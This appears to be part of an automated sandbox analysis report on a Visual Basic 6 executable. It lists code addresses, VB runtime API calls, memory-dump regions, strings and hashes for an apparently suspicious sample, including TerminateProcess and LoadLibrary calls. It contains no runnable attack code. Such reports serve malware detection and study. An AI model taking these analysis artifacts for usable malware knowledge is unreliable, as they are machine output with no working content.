                                                          0x004119a3
                                                          0x004119a6
                                                          0x004119ac
                                                          0x004119b1
                                                          0x004119b1
                                                          0x004119c6
                                                          0x004119cc
                                                          0x004119d0
                                                          0x004119d1
                                                          0x004119d3
                                                          0x004119e2
                                                          0x004119ff
                                                          0x004119e4
                                                          0x004119e4
                                                          0x004119e9
                                                          0x004119ee
                                                          0x004119f3
                                                          0x004119f3
                                                          0x00411a23
                                                          0x00411a27
                                                          0x00411a2c
                                                          0x00411a44
                                                          0x00411a4a
                                                          0x00411a4c
                                                          0x00411a59
                                                          0x00411a7e
                                                          0x00411a5b
                                                          0x00411a5b
                                                          0x00411a60
                                                          0x00411a65
                                                          0x00411a6b
                                                          0x00411a71
                                                          0x00411a76
                                                          0x00411a76
                                                          0x00411a8c
                                                          0x00411aa9
                                                          0x00411a8e
                                                          0x00411a8e
                                                          0x00411a93
                                                          0x00411a98
                                                          0x00411a9d
                                                          0x00411a9d
                                                          0x00411acd
                                                          0x00411ad1
                                                          0x00411ad6
                                                          0x00411aee
                                                          0x00411af4
                                                          0x00411af6
                                                          0x00411b03
                                                          0x00411b28
                                                          0x00411b05
                                                          0x00411b05
                                                          0x00411b0a
                                                          0x00411b0f
                                                          0x00411b15
                                                          0x00411b1b
                                                          0x00411b20
                                                          0x00411b20
                                                          0x00411b2f
                                                          0x00411b31
                                                          0x00411b33
                                                          0x00411b3c
                                                          0x00411b3d
                                                          0x00411b4c
                                                          0x00411b69
                                                          0x00411b4e
                                                          0x00411b4e
                                                          0x00411b53
                                                          0x00411b58
                                                          0x00411b5d
                                                          0x00411b5d
                                                          0x00411b83
                                                          0x00411b8d
                                                          0x00411b91
                                                          0x00411b96
                                                          0x00411bae
                                                          0x00411bb4
                                                          0x00411bb6
                                                          0x00411bc3
                                                          0x00411be8
                                                          0x00411bc5
                                                          0x00411bc5
                                                          0x00411bca
                                                          0x00411bcf
                                                          0x00411bd5
                                                          0x00411bdb
                                                          0x00411be0
                                                          0x00411be0
                                                          0x00411bf2
                                                          0x00411bf8
                                                          0x00411c02
                                                          0x00411c08
                                                          0x00411c18
                                                          0x00411c1e
                                                          0x00411c25
                                                          0x00411c2a
                                                          0x00411c33
                                                          0x00411c39
                                                          0x00411c43
                                                          0x00411c46
                                                          0x00411c4d
                                                          0x00411c57
                                                          0x00411c89
                                                          0x00411c9b
                                                          0x00411ca1
                                                          0x00411cae
                                                          0x00411cd0
                                                          0x00411cb0
                                                          0x00411cb0
                                                          0x00411cb5
                                                          0x00411cba
                                                          0x00411cbd
                                                          0x00411cc3
                                                          0x00411cc8
                                                          0x00411cc8
                                                          0x00411cdd
                                                          0x00411ce3
                                                          0x00411ce7
                                                          0x00411ceb
                                                          0x00411cef
                                                          0x00411cf0
                                                          0x00411cf2
                                                          0x00411d00
                                                          0x00411d07
                                                          0x00411d0b
                                                          0x00411d0c
                                                          0x00411d0e
                                                          0x00411d1d
                                                          0x00411d3a
                                                          0x00411d1f
                                                          0x00411d1f
                                                          0x00411d24
                                                          0x00411d29
                                                          0x00411d2e
                                                          0x00411d2e
                                                          0x00411d5e
                                                          0x00411d62
                                                          0x00411d67
                                                          0x00411d7f
                                                          0x00411d85
                                                          0x00411d87
                                                          0x00411d94
                                                          0x00411db9
                                                          0x00411d96
                                                          0x00411d96
                                                          0x00411d9b
                                                          0x00411da0
                                                          0x00411da6
                                                          0x00411dac
                                                          0x00411db1
                                                          0x00411db1
                                                          0x00411dc7
                                                          0x00411de4
                                                          0x00411dc9
                                                          0x00411dc9
                                                          0x00411dce
                                                          0x00411dd3
                                                          0x00411dd8
                                                          0x00411dd8
                                                          0x00411e08
                                                          0x00411e0c
                                                          0x00411e11
                                                          0x00411e29
                                                          0x00411e2f
                                                          0x00411e31
                                                          0x00411e3e
                                                          0x00411e63
                                                          0x00411e40
                                                          0x00411e40
                                                          0x00411e45
                                                          0x00411e4a
                                                          0x00411e50
                                                          0x00411e56
                                                          0x00411e5b
                                                          0x00411e5b
                                                          0x00411e78
                                                          0x00411e87
                                                          0x00411e91
                                                          0x00411e99
                                                          0x00411e9f
                                                          0x00411ea9
                                                          0x00411eac
                                                          0x00411ebb
                                                          0x00411ece
                                                          0x00411ed8
                                                          0x00411ed9
                                                          0x00411eda
                                                          0x00411edb
                                                          0x00411ee8
                                                          0x00411eee
                                                          0x00411efb
                                                          0x00411f1d
                                                          0x00411efd
                                                          0x00411efd
                                                          0x00411f02
                                                          0x00411f07
                                                          0x00411f0a
                                                          0x00411f10
                                                          0x00411f15
                                                          0x00411f15
                                                          0x00411f2d
                                                          0x00411f35
                                                          0x00411f39
                                                          0x00411f3a
                                                          0x00411f3c
                                                          0x00411f47
                                                          0x00411f4b
                                                          0x00411f4f
                                                          0x00411f50
                                                          0x00411f52
                                                          0x00411f60
                                                          0x00411f64
                                                          0x00411f65
                                                          0x00411f67
                                                          0x00411f76
                                                          0x00411f93
                                                          0x00411f78
                                                          0x00411f78
                                                          0x00411f7d
                                                          0x00411f82
                                                          0x00411f87
                                                          0x00411f87
                                                          0x00411fb7
                                                          0x00411fbb
                                                          0x00411fc0
                                                          0x00411fdb
                                                          0x00411fe1
                                                          0x00411fe3
                                                          0x00411ff0
                                                          0x00412015
                                                          0x00411ff2
                                                          0x00411ff2
                                                          0x00411ff7
                                                          0x00411ffc
                                                          0x00412002
                                                          0x00412008
                                                          0x0041200d
                                                          0x0041200d
                                                          0x00412023
                                                          0x00412040
                                                          0x00412025
                                                          0x00412025
                                                          0x0041202a
                                                          0x0041202f
                                                          0x00412034
                                                          0x00412034
                                                          0x00412064
                                                          0x00412068
                                                          0x0041206d
                                                          0x00412085
                                                          0x0041208b
                                                          0x0041208d
                                                          0x0041209a
                                                          0x004120bf
                                                          0x0041209c
                                                          0x0041209c
                                                          0x004120a1
                                                          0x004120a6
                                                          0x004120ac
                                                          0x004120b2
                                                          0x004120b7
                                                          0x004120b7
                                                          0x004120cd
                                                          0x004120ea
                                                          0x004120cf
                                                          0x004120cf
                                                          0x004120d4
                                                          0x004120d9
                                                          0x004120de
                                                          0x004120de
                                                          0x0041210e
                                                          0x00412112
                                                          0x00412117
                                                          0x0041212f
                                                          0x00412132
                                                          0x00412134
                                                          0x00412141
                                                          0x00412163
                                                          0x00412143
                                                          0x00412143
                                                          0x00412145
                                                          0x0041214a
                                                          0x00412150
                                                          0x00412156
                                                          0x0041215b
                                                          0x0041215b
                                                          0x00412171
                                                          0x0041218e
                                                          0x00412173
                                                          0x00412173
                                                          0x00412178
                                                          0x0041217d
                                                          0x00412182
                                                          0x00412182
                                                          0x004121b2
                                                          0x004121b6
                                                          0x004121bb
                                                          0x004121d3
                                                          0x004121d9
                                                          0x004121db
                                                          0x004121e8
                                                          0x0041220d
                                                          0x004121ea
                                                          0x004121ea
                                                          0x004121ef
                                                          0x004121f4
                                                          0x004121fa
                                                          0x00412200
                                                          0x00412205
                                                          0x00412205
                                                          0x0041221b
                                                          0x00412238
                                                          0x0041221d
                                                          0x0041221d
                                                          0x00412222
                                                          0x00412227
                                                          0x0041222c
                                                          0x0041222c
                                                          0x0041225c
                                                          0x00412260
                                                          0x00412265
                                                          0x0041227d
                                                          0x00412280
                                                          0x00412282
                                                          0x0041228f
                                                          0x004122b1
                                                          0x00412291
                                                          0x00412291
                                                          0x00412293
                                                          0x00412298
                                                          0x0041229e
                                                          0x004122a4
                                                          0x004122a9
                                                          0x004122a9
                                                          0x004122bf
                                                          0x004122dc
                                                          0x004122c1
                                                          0x004122c1
                                                          0x004122c6
                                                          0x004122cb
                                                          0x004122d0
                                                          0x004122d0
                                                          0x00412300
                                                          0x00412304
                                                          0x00412309
                                                          0x00412324
                                                          0x0041232a
                                                          0x0041232c
                                                          0x00412339
                                                          0x0041235e
                                                          0x0041233b
                                                          0x0041233b
                                                          0x00412340
                                                          0x00412345
                                                          0x0041234b
                                                          0x00412351
                                                          0x00412356
                                                          0x00412356
                                                          0x0041236b
                                                          0x00412374
                                                          0x0041237a
                                                          0x00412384
                                                          0x0041238a
                                                          0x00412397
                                                          0x0041239d
                                                          0x004123aa
                                                          0x004123b2
                                                          0x004123b8
                                                          0x004123c2
                                                          0x004123c8
                                                          0x004123d5
                                                          0x004123db
                                                          0x004123e5
                                                          0x004123e8
                                                          0x004123f9
                                                          0x00412406
                                                          0x00412407
                                                          0x00412408
                                                          0x00412409
                                                          0x00412436
                                                          0x0041243f
                                                          0x0041245e
                                                          0x0041247a
                                                          0x0041248a
                                                          0x00412490
                                                          0x0041249d
                                                          0x004124bf
                                                          0x0041249f
                                                          0x0041249f
                                                          0x004124a4
                                                          0x004124a9
                                                          0x004124ac
                                                          0x004124b2
                                                          0x004124b7
                                                          0x004124b7
                                                          0x004124c6
                                                          0x004124cd
                                                          0x004124ce
                                                          0x00412535
                                                          0x0041253a

                                                          APIs
                                                          • __vbaChkstk.MSVBVM60(?,00401216), ref: 0041112E
                                                          • #651.MSVBVM60(00000002), ref: 0041116E
                                                          • __vbaStrMove.MSVBVM60(00000002), ref: 00411178
                                                          • __vbaStrCmp.MSVBVM60(Out of string space,00000000,00000002), ref: 00411183
                                                          • __vbaFreeStr.MSVBVM60(Out of string space,00000000,00000002), ref: 0041119A
                                                          • __vbaFreeVar.MSVBVM60(Out of string space,00000000,00000002), ref: 004111A2
                                                          • #570.MSVBVM60(00000083,Out of string space,00000000,00000002), ref: 004111B7
                                                          • __vbaNew2.MSVBVM60(0040509C,00414010,Out of string space,00000000,00000002), ref: 004111D2
                                                          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00404A64,000002B4), ref: 00411236
                                                          • __vbaNew2.MSVBVM60(0040509C,00414010), ref: 0041125D
                                                          • __vbaObjSet.MSVBVM60(?,00000000), ref: 00411296
                                                          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00404E10,00000158), ref: 004112E0
                                                          • __vbaHresultCheckObj.MSVBVM60(00000000,00401118,00404A94,000006FC,?,00000008,?), ref: 00411356
                                                          • __vbaFreeObj.MSVBVM60(?,00000008,?), ref: 00411376
                                                          • __vbaFreeVar.MSVBVM60(?,00000008,?), ref: 0041137E
                                                          • __vbaNew2.MSVBVM60(0040509C,00414010,?,00000008,?), ref: 00411396
                                                          • __vbaObjSet.MSVBVM60(?,00000000,?,00000008,?), ref: 004113CF
                                                          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00404E10,00000138,?,00000008,?), ref: 0041141C
                                                          • __vbaVarDup.MSVBVM60(?,00000008,?), ref: 0041144D
                                                          • __vbaChkstk.MSVBVM60(?,00000008,?,?,?,?,00000008,?), ref: 00411494
                                                          • __vbaHresultCheckObj.MSVBVM60(00000000,00401118,00404A94,00000700,?,?,?,?,00000008,?), ref: 004114D5
                                                          • __vbaFreeObj.MSVBVM60(?,?,?,?,00000008,?), ref: 004114F5
                                                          • __vbaFreeVar.MSVBVM60(?,?,?,?,00000008,?), ref: 004114FD
                                                          • __vbaNew2.MSVBVM60(0040509C,00414010,?,?,?,?,00000008,?), ref: 00411515
                                                          • __vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,00000008,?), ref: 0041154E
                                                          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00404E10,00000160,?,?,?,?,00000008,?), ref: 00411598
                                                          • __vbaLateIdCallLd.MSVBVM60(00000008,?,00000000,00000000,?,?,?,?,00000008,?), ref: 004115B7
                                                          • __vbaNew2.MSVBVM60(0040509C,00414010,?,?,?,00401216), ref: 004115D2
                                                          • __vbaObjSet.MSVBVM60(?,00000000), ref: 0041160B
                                                          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00404E10,00000140), ref: 00411658
                                                          • __vbaNew2.MSVBVM60(0040509C,00414010), ref: 0041167F
                                                          • __vbaObjSet.MSVBVM60(?,00000000), ref: 004116B8
                                                          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00404E10,00000060), ref: 004116FF
                                                          • __vbaI4Var.MSVBVM60(?,?,00000003,FFEAA630,00005AF7), ref: 00411750
                                                          • __vbaFreeObjList.MSVBVM60(00000004,?,?,?,?), ref: 00411791
                                                          • __vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,?,?,?,?,?,?,00401216), ref: 004117A6
                                                          • __vbaHresultCheckObj.MSVBVM60(00000000,00401118,00404A94,00000704), ref: 004117E5
                                                          • __vbaNew2.MSVBVM60(0040509C,00414010), ref: 00411815
                                                          • __vbaObjSet.MSVBVM60(?,00000000), ref: 0041184E
                                                          • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00404E10,00000088), ref: 0041189B
                                                          • __vbaNew2.MSVBVM60(0040509C,00414010), ref: 004118C2
                                                          • __vbaObjSet.MSVBVM60(?,00000000), ref: 004118FB
                                                          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00404E10,00000080), ref: 00411948
                                                          • __vbaHresultCheckObj.MSVBVM60(00000000,00401118,00404A94,00000708,?,?,003470F7,?), ref: 004119AC
                                                          • __vbaFreeObjList.MSVBVM60(00000002,?,?,?,?,003470F7,?), ref: 004119D3
                                                          • __vbaNew2.MSVBVM60(0040509C,00414010), ref: 004119EE
                                                          • __vbaObjSet.MSVBVM60(?,00000000), ref: 00411A27
                                                          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00404E38,00000120), ref: 00411A71
                                                          • __vbaNew2.MSVBVM60(0040509C,00414010), ref: 00411A98
                                                          • __vbaObjSet.MSVBVM60(?,00000000), ref: 00411AD1
                                                          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00404E10,00000160), ref: 00411B1B
                                                          • __vbaLateIdCallLd.MSVBVM60(?,?,00000000,00000000), ref: 00411B3D
                                                          • __vbaNew2.MSVBVM60(0040509C,00414010), ref: 00411B58
                                                          • __vbaObjSet.MSVBVM60(?,00000000), ref: 00411B91
                                                          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00404E10,00000130), ref: 00411BDB
                                                          • __vbaI4Var.MSVBVM60(?), ref: 00411C25
                                                          • __vbaHresultCheckObj.MSVBVM60(00000000,00401118,00404A94,0000070C,?,?,00000009,?,?,00000009,?,?), ref: 00411CC3
                                                          • __vbaFreeObjList.MSVBVM60(00000004,?,?,?,?,?,?,00000009,?,?,00000009,?,?), ref: 00411CF2
                                                          • __vbaFreeVarList.MSVBVM60(00000003,?,?,?), ref: 00411D0E
                                                          • __vbaNew2.MSVBVM60(0040509C,00414010), ref: 00411D29
                                                          • __vbaObjSet.MSVBVM60(?,00000000), ref: 00411D62
                                                          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00404E10,000000F8), ref: 00411DAC
                                                          • __vbaNew2.MSVBVM60(0040509C,00414010), ref: 00411DD3
                                                          • __vbaObjSet.MSVBVM60(?,00000000), ref: 00411E0C
                                                          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00404E10,00000130), ref: 00411E56
                                                          • __vbaLateIdCallLd.MSVBVM60(?,?,00000000,00000000), ref: 00411E78
                                                          • __vbaStrVarMove.MSVBVM60(?), ref: 00411E87
                                                          • __vbaStrMove.MSVBVM60(?), ref: 00411E91
                                                          • __vbaStrCopy.MSVBVM60(?), ref: 00411EBB
                                                          • __vbaChkstk.MSVBVM60(?,?,?), ref: 00411ECE
                                                          • __vbaHresultCheckObj.MSVBVM60(00000000,00401118,00404A94,00000710), ref: 00411F10
                                                          • __vbaVarMove.MSVBVM60(00000000,00401118,00404A94,00000710), ref: 00411F2D
                                                          • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 00411F3C
                                                          • __vbaFreeObjList.MSVBVM60(00000003,?,?,?), ref: 00411F52
                                                          • __vbaFreeVarList.MSVBVM60(00000002,00000009,?), ref: 00411F67
                                                          • __vbaNew2.MSVBVM60(0040509C,00414010), ref: 00411F82
                                                          • __vbaObjSet.MSVBVM60(?,00000000), ref: 00411FBB
                                                          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00404E10,000000D8), ref: 00412008
                                                          • __vbaNew2.MSVBVM60(0040509C,00414010), ref: 0041202F
                                                          • __vbaObjSet.MSVBVM60(00000000,00000000), ref: 00412068
                                                          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00404E10,00000158), ref: 004120B2
                                                          • __vbaNew2.MSVBVM60(0040509C,00414010), ref: 004120D9
                                                          • __vbaObjSet.MSVBVM60(?,00000000), ref: 00412112
                                                          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00404E10,00000050), ref: 00412156
                                                          • __vbaNew2.MSVBVM60(0040509C,00414010), ref: 0041217D
                                                          • __vbaObjSet.MSVBVM60(?,00000000), ref: 004121B6
                                                          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00404E38,00000198), ref: 00412200
                                                          • __vbaNew2.MSVBVM60(0040509C,00414010), ref: 00412227
                                                          • __vbaObjSet.MSVBVM60(?,00000000), ref: 00412260
                                                          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00404E38,00000048), ref: 004122A4
                                                          • __vbaNew2.MSVBVM60(0040509C,00414010), ref: 004122CB
                                                          • __vbaObjSet.MSVBVM60(?,00000000), ref: 00412304
                                                          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00404E10,00000118), ref: 00412351
                                                          • __vbaStrMove.MSVBVM60(00000000,?,00404E10,00000118), ref: 004123AA
                                                          • __vbaChkstk.MSVBVM60(?), ref: 004123F9
                                                          • __vbaFreeStr.MSVBVM60 ref: 0041243F
                                                          • __vbaFreeObjList.MSVBVM60(00000006,?,00000000,?,?,?,?), ref: 0041245E
                                                          • __vbaFreeVarList.MSVBVM60(00000003,00000008,00000008,00000008), ref: 0041247A
                                                          • __vbaHresultCheckObj.MSVBVM60(00000000,00401118,00404A94,000006F8), ref: 004124B2
                                                          • __vbaFreeVar.MSVBVM60(0041253B), ref: 00412535
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.389234188.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.389229351.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.389244173.0000000000414000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.389248014.0000000000416000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: __vba$CheckHresult$New2$Free$List$Move$Chkstk$CallLate$#570#651Copy
                                                          • String ID: Out of string space$Refunded$gumly
                                                          • API String ID: 4012266371-2839041377
                                                          • Opcode ID: 024d674a9b54f9370c011854c4d875787db1ab9f9827c03d306494308b1a7a88
                                                          • Instruction ID: 7178057aecdf32fe825a7f3e50123af76b3c3621989a7c9c5f934a25bf7bcbef
                                                          • Opcode Fuzzy Hash: 024d674a9b54f9370c011854c4d875787db1ab9f9827c03d306494308b1a7a88
                                                          • Instruction Fuzzy Hash: 89C2E5B1900228DFDB20DF91CC45BDDBBB4BB08304F1045EAE609BB2A1DB795A84DF58
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 022608F8, Relevance: 21.3, APIs: 1, Strings: 11, Instructions: 323COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.389525388.0000000002260000.00000040.00000001.sdmp, Offset: 02260000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID: WZ<$Z@$W$ #$ #$',$3'$9A$X@$z>$W
                                                          • API String ID: 0-2923609791
                                                          • Opcode ID: 38336ec38b34a4fba0dce83ffefb37aea2d79f7da90069c03eab95f909efd2f9
                                                          • Instruction ID: c9e1fff9ebfdc1bc316d895c88da2cf37609b33410a118e3b901c949e10286c3
                                                          • Opcode Fuzzy Hash: 38336ec38b34a4fba0dce83ffefb37aea2d79f7da90069c03eab95f909efd2f9
                                                          • Instruction Fuzzy Hash: 0991812BB60307AAEB3025F84DBC7FE12976F83394FE54526DC829718CD76985C6C902
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0226095B, Relevance: 21.3, APIs: 1, Strings: 11, Instructions: 304COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.389525388.0000000002260000.00000040.00000001.sdmp, Offset: 02260000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID: WZ<$Z@$W$ #$ #$',$3'$9A$X@$z>$W
                                                          • API String ID: 0-2923609791
                                                          • Opcode ID: 0e2c614131850596bd3fd56288f61c7c51e3082acff720d03967787ff5c49508
                                                          • Instruction ID: 6980f74643d255fb451d49951fa83a8e6ff08ae0b4a678dc479f2bff2cbc3a1b
                                                          • Opcode Fuzzy Hash: 0e2c614131850596bd3fd56288f61c7c51e3082acff720d03967787ff5c49508
                                                          • Instruction Fuzzy Hash: BA919E2BB60307AAEB3025F84CBC3FE26976F82350FE48526DC869718DD76985C6C502
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 022609B1, Relevance: 21.3, APIs: 1, Strings: 11, Instructions: 287COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.389525388.0000000002260000.00000040.00000001.sdmp, Offset: 02260000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID: WZ<$Z@$W$ #$ #$',$3'$9A$X@$z>$W
                                                          • API String ID: 0-2923609791
                                                          • Opcode ID: 2b867f1d99b8a784c006ffed70126018d491af728c76032ae6881d9dfd67a2af
                                                          • Instruction ID: dbed3546b5a0ae9fb581ed5fc438682f5893640d283c6423a7f68b6b3c93cb65
                                                          • Opcode Fuzzy Hash: 2b867f1d99b8a784c006ffed70126018d491af728c76032ae6881d9dfd67a2af
                                                          • Instruction Fuzzy Hash: E4818E2BB60307AAEF3025B84DBC7FE16976F83360FE48526DC869718DD76985C5C902
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02260A12, Relevance: 17.8, APIs: 1, Strings: 9, Instructions: 268COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.389525388.0000000002260000.00000040.00000001.sdmp, Offset: 02260000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID: WZ<$Z@$W$ #$ #$9A$X@$z>$W
                                                          • API String ID: 0-1724933843
                                                          • Opcode ID: 7e5f03de84cf34d94caf4920b0464437499f6ede18e71a836fe9ef963f57bb6d
                                                          • Instruction ID: c1f74811bf574a056c19ebfb5b516444fe966b326f8ab86f5a8e97fb1062c73f
                                                          • Opcode Fuzzy Hash: 7e5f03de84cf34d94caf4920b0464437499f6ede18e71a836fe9ef963f57bb6d
                                                          • Instruction Fuzzy Hash: 8C71AF27A60307AAEB3025A88CBC7FE22977F83364FE44526DC869718DD76995C5C502
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02260B15, Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 206COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.389525388.0000000002260000.00000040.00000001.sdmp, Offset: 02260000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID: WZ<$W$ #$9A$z>
                                                          • API String ID: 0-468839717
                                                          • Opcode ID: 05720849b23866c5bda535d82f8f656a6be9b50dd8b42338373c0ee96dea9b41
                                                          • Instruction ID: f31bd536e1a08722b866b14484b021fb1503605d88655b7387755a852f10af30
                                                          • Opcode Fuzzy Hash: 05720849b23866c5bda535d82f8f656a6be9b50dd8b42338373c0ee96dea9b41
                                                          • Instruction Fuzzy Hash: 5551E227A60347AAEB3029B84DFC3FE12966F83354FE44526DC958718DD71985C5C501
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02260B76, Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 184COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.389525388.0000000002260000.00000040.00000001.sdmp, Offset: 02260000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID: WZ<$ #$9A$z>
                                                          • API String ID: 0-1847163642
                                                          • Opcode ID: f246247401f4f225c4b1905419674bc321fe712909920f8231167789a8cd86b1
                                                          • Instruction ID: bf42e35b69c75dac9177ed30eb6667a0fe203fa91e5b102ed2d95abc0c4a8bca
                                                          • Opcode Fuzzy Hash: f246247401f4f225c4b1905419674bc321fe712909920f8231167789a8cd86b1
                                                          • Instruction Fuzzy Hash: E051E22BA703479AEB3029B849FC3FE17966F433A4FE48639CC918718DD71985C5C502
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02260BCE, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 163COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.389525388.0000000002260000.00000040.00000001.sdmp, Offset: 02260000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID: WZ<$ #$z>
                                                          • API String ID: 0-3971892802
                                                          • Opcode ID: 56563baa0fcaac068a17a33b9ae8e73424a24e7e1451426228824e59888fa030
                                                          • Instruction ID: e24e847920640b81423dd8631d48f8bf34bb5c46e02312a13fa6fdbc2c0b7a20
                                                          • Opcode Fuzzy Hash: 56563baa0fcaac068a17a33b9ae8e73424a24e7e1451426228824e59888fa030
                                                          • Instruction Fuzzy Hash: 3341D02766034799DB3429B849FC3FE27A66F43394FE48626DC92C718DD71986C5C902
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02260D70, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 105COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • TerminateProcess.KERNELBASE(000000FF,00000000,?,?,?,00000000,000000FF,00000007,?,00000004,00000000), ref: 02262CCC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.389525388.0000000002260000.00000040.00000001.sdmp, Offset: 02260000, based on PE: false
                                                          Similarity
                                                          • API ID: ProcessTerminate
                                                          • String ID: WZ<
                                                          • API String ID: 560597551-3982570292
                                                          • Opcode ID: d01ea8e25bbee1b40e6ea1b7b9b88bc0cb498cd14dc82c6254c838a2e811af37
                                                          • Instruction ID: f0ef0cdf010dbd7307cf1079f06d92bad596b6a6e6646ef8b841a74d68ce102e
                                                          • Opcode Fuzzy Hash: d01ea8e25bbee1b40e6ea1b7b9b88bc0cb498cd14dc82c6254c838a2e811af37
                                                          • Instruction Fuzzy Hash: 0B31CD27A657C6EAE72056B84CAC7BE2745AF03384F644768DCA6471CEC72A91C4D601
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02260CFC, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 101COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • TerminateProcess.KERNELBASE(000000FF,00000000,?,?,?,00000000,000000FF,00000007,?,00000004,00000000), ref: 02262CCC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.389525388.0000000002260000.00000040.00000001.sdmp, Offset: 02260000, based on PE: false
                                                          Similarity
                                                          • API ID: ProcessTerminate
                                                          • String ID: WZ<
                                                          • API String ID: 560597551-3982570292
                                                          • Opcode ID: dc61b9fcdbcf2d88c5f768fa6043240ffb1e7b7eb1177fc5d59473ec404db272
                                                          • Instruction ID: 6a5e7f6070e8e15733875a7fa14ce72af2441c666a43759a7ccfb13034f2ad07
                                                          • Opcode Fuzzy Hash: dc61b9fcdbcf2d88c5f768fa6043240ffb1e7b7eb1177fc5d59473ec404db272
                                                          • Instruction Fuzzy Hash: FB31CC239647C6EAEB302AB84CAC7FE3345AF03394FA44759DCA6471CAC32691C5D602
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 022604FC, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.389525388.0000000002260000.00000040.00000001.sdmp, Offset: 02260000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID: \6
                                                          • API String ID: 0-1032131421
                                                          • Opcode ID: abbddf2a7cf95c3734240657caf629c6a250b89c5eb95abbf79744a47447af5e
                                                          • Instruction ID: 1665103a641d662d4194c0d0cedbca4f21eb600a33eed32042fc7f2bd8bdd2c7
                                                          • Opcode Fuzzy Hash: abbddf2a7cf95c3734240657caf629c6a250b89c5eb95abbf79744a47447af5e
                                                          • Instruction Fuzzy Hash: 39117A372387825ED7209AA48C9C7F93F5AFB43330F584196D412470C8CA6151C5EA11
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 022639D7, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 62COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.389525388.0000000002260000.00000040.00000001.sdmp, Offset: 02260000, based on PE: false
                                                          Similarity
                                                          • API ID: LibraryLoad
                                                          • String ID: rX4
                                                          • API String ID: 1029625771-805084833
                                                          • Opcode ID: 191933f0be911448f0aca7cf01254c97f293bee5605f3bd641d2ad1d84f283e2
                                                          • Instruction ID: f390eeedc67f6edc2547226fb10ed6cf41870de8ca2226551473ad33711054c2
                                                          • Opcode Fuzzy Hash: 191933f0be911448f0aca7cf01254c97f293bee5605f3bd641d2ad1d84f283e2
                                                          • Instruction Fuzzy Hash: 8601A5AEF2431B699F353EE5A9587B963979F423A4F20402AACD5C218CDB34C8C9C915
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 02260DEE, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 45COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • TerminateProcess.KERNELBASE(000000FF,00000000,?,?,?,00000000,000000FF,00000007,?,00000004,00000000), ref: 02262CCC
                                                          Strings
